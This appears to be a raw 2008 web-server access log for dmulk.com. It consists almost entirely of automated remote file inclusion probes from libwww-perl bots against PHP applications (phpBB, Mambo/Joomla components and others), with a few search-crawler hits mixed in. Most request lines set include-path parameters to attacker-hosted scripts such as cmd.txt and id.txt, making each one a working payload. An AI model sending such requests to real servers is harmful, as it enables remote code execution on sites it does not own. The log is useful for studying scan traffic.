64.27.19.194 - - [07/Apr/2008:12:24:22 -0700] "GET /logs/access_080120.log/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://brutalside.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.27.19.194 - - [07/Apr/2008:12:24:22 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://brutalside.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.27.19.194 - - [07/Apr/2008:12:24:22 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://brutalside.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.27.19.194 - - [07/Apr/2008:12:24:25 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://brutalside.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:24:26 -0700] "GET /logs/access_080218.log//?mosConfig_absolute_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:24:27 -0700] "GET //?mosConfig_absolute_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:24:28 -0700] "GET /logs//?mosConfig_absolute_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 200 42127 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:24:36 -0700] "GET /logs/access_080219.log//?mosConfig_absolute_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:12:24:51 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.191.68.75 - - [07/Apr/2008:12:25:10 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.191.68.75 - - [07/Apr/2008:12:25:10 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.118.85.129 - - [07/Apr/2008:12:25:15 -0700] "GET /logs/access_080223.log/%22PHP/includes/header.inc.php?root=%22http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [07/Apr/2008:12:25:15 -0700] "GET /%22PHP/includes/header.inc.php?root=%22http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [07/Apr/2008:12:25:15 -0700] "GET /logs/%22PHP/includes/header.inc.php?root=%22http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.201.13.98 - - [07/Apr/2008:12:25:24 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://bogazlikoyu.com/media/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
67.201.13.98 - - [07/Apr/2008:12:25:24 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://bogazlikoyu.com/media/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:25:26 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:25:26 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:25:26 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:25:28 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.216.89 - - [07/Apr/2008:12:25:52 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.122.47.228 - - [07/Apr/2008:12:25:59 -0700] "GET /logs/access_080130.log//agendax/addevent.inc.php?agendax_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [07/Apr/2008:12:25:59 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [07/Apr/2008:12:26:00 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.230.71.1 - - [07/Apr/2008:12:26:18 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.103.164.226 - - [07/Apr/2008:12:26:50 -0700] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.103.164.226 - - [07/Apr/2008:12:26:50 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.103.164.226 - - [07/Apr/2008:12:26:50 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.240.146 - - [07/Apr/2008:12:26:51 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.53.138.149 - - [07/Apr/2008:12:27:04 -0700] "GET /logs/access_080215.log/include/functions_common.php?gl_root_path=http://www.company-domains.net/wsnlinks/admin/php.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.138.149 - - [07/Apr/2008:12:27:04 -0700] "GET /include/functions_common.php?gl_root_path=http://www.company-domains.net/wsnlinks/admin/php.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.138.149 - - [07/Apr/2008:12:27:04 -0700] "GET /logs/include/functions_common.php?gl_root_path=http://www.company-domains.net/wsnlinks/admin/php.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.103.164.226 - - [07/Apr/2008:12:27:04 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:12:27:07 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:12:27:07 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.103.164.226 - - [07/Apr/2008:12:27:26 -0700] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.22.128 - - [07/Apr/2008:12:27:38 -0700] "GET /logs/access_080329.log/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.127.40.40 - - [07/Apr/2008:12:27:42 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.226.60.4 - - [07/Apr/2008:12:27:42 -0700] "GET /logs/access_080118.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [07/Apr/2008:12:27:43 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:12:28:48 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:12:28:49 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:12:29:03 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:29:10 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:29:11 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:29:11 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:12:29:16 -0700] "GET /logs/access_080223.log/%22PHP/includes/header.inc.php?root=%22http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:12:29:16 -0700] "GET /%22PHP/includes/header.inc.php?root=%22http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:12:29:16 -0700] "GET /logs/%22PHP/includes/header.inc.php?root=%22http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:29:18 -0700] "GET /logs/access_080312.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:29:19 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:29:19 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:29:23 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:29:23 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:29:24 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:12:29:31 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:29:35 -0700] "GET /logs/access_080324.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:29:35 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:29:35 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.122.47.228 - - [07/Apr/2008:12:29:36 -0700] "GET /logs/access_080106.log/admin.php?include_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [07/Apr/2008:12:29:37 -0700] "GET /admin.php?include_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [07/Apr/2008:12:29:37 -0700] "GET /logs/admin.php?include_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.112.35.27 - - [07/Apr/2008:12:29:40 -0700] "GET /logs/board.php?see=http://www.firerunners.nl//test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
222.122.47.228 - - [07/Apr/2008:12:29:44 -0700] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.112.35.27 - - [07/Apr/2008:12:29:46 -0700] "GET /board.php?see=http://www.firerunners.nl//test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:30:04 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.89.199 - - [07/Apr/2008:12:30:07 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://66.153.86.221/www?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [07/Apr/2008:12:30:07 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://66.153.86.221/www?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:30:09 -0700] "GET /logs/access_080127.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:12:30:12 -0700] "GET /logs/access_080215.log/voir.php?inc=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:12:30:12 -0700] "GET /voir.php?inc=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:12:30:12 -0700] "GET /logs/voir.php?inc=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:30:24 -0700] "GET /logs/access_080127.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.252.17.105 - - [07/Apr/2008:12:30:25 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.252.17.105 - - [07/Apr/2008:12:30:25 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.252.17.105 - - [07/Apr/2008:12:30:26 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.240.211.107 - - [07/Apr/2008:12:30:28 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.18.207.65 - - [07/Apr/2008:12:30:36 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.247.251.105 - - [07/Apr/2008:12:30:37 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.247.251.105 - - [07/Apr/2008:12:30:37 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.247.251.105 - - [07/Apr/2008:12:30:37 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
195.205.178.120 - - [07/Apr/2008:12:30:44 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [07/Apr/2008:12:30:45 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [07/Apr/2008:12:30:46 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
60.248.163.135 - - [07/Apr/2008:12:30:48 -0700] "GET /logs/access_080118.log//inc/cmses/aedating4CMS.php?dir[inc]=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.248.163.135 - - [07/Apr/2008:12:30:49 -0700] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.247.251.105 - - [07/Apr/2008:12:30:49 -0700] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
60.248.163.135 - - [07/Apr/2008:12:30:50 -0700] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [07/Apr/2008:12:30:53 -0700] "GET /logs/access_071214.log/admin.php?include_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.248.163.135 - - [07/Apr/2008:12:31:01 -0700] "GET /logs/access_080124.log//inc/cmses/aedating4CMS.php?dir[inc]=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:31:04 -0700] "GET /logs/access_071227.log//modules/My_eGallery/index.php?basepath=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:31:04 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:31:04 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:31:04 -0700] "GET /logs/access_080306.log//modules/My_eGallery/index.php?basepath=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:31:06 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:31:13 -0700] "GET /logs/access_071227.log//modules/My_eGallery/index.php?basepath=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:31:13 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:31:13 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:31:14 -0700] "GET /logs/access_080306.log//modules/My_eGallery/index.php?basepath=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:31:18 -0700] "GET /logs/access_071227.log//modules/My_eGallery/index.php?basepath=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:31:18 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:31:18 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:31:18 -0700] "GET /logs/access_080306.log//modules/My_eGallery/index.php?basepath=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.205.178.120 - - [07/Apr/2008:12:31:29 -0700] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.23.226 - - [07/Apr/2008:12:31:32 -0700] "GET /blog/index.php/2008/ HTTP/1.0" 200 6398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
213.198.89.199 - - [07/Apr/2008:12:31:57 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://66.153.86.221/www?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.176.28 - - [07/Apr/2008:12:32:33 -0700] "GET /logs/access_071216.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.27.19.194 - - [07/Apr/2008:12:32:55 -0700] "GET /logs/access_080128.log/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://brutalside.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.191.68.75 - - [07/Apr/2008:12:33:17 -0700] "GET /logs/access_080223.log//errors.php?error=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.191.68.75 - - [07/Apr/2008:12:33:17 -0700] "GET /logs//errors.php?error=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
60.248.163.135 - - [07/Apr/2008:12:33:25 -0700] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:12:33:36 -0700] "GET /logs/access_080211.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:12:33:37 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:12:33:37 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:12:33:38 -0700] "GET /logs/access_071229.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.20.236 - - [07/Apr/2008:12:33:40 -0700] "GET /blog/ HTTP/1.0" 200 7356 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
212.191.68.75 - - [07/Apr/2008:12:33:44 -0700] "GET /logs/access_080218.log//errors.php?error=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.201.13.98 - - [07/Apr/2008:12:33:49 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://bogazlikoyu.com/media/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
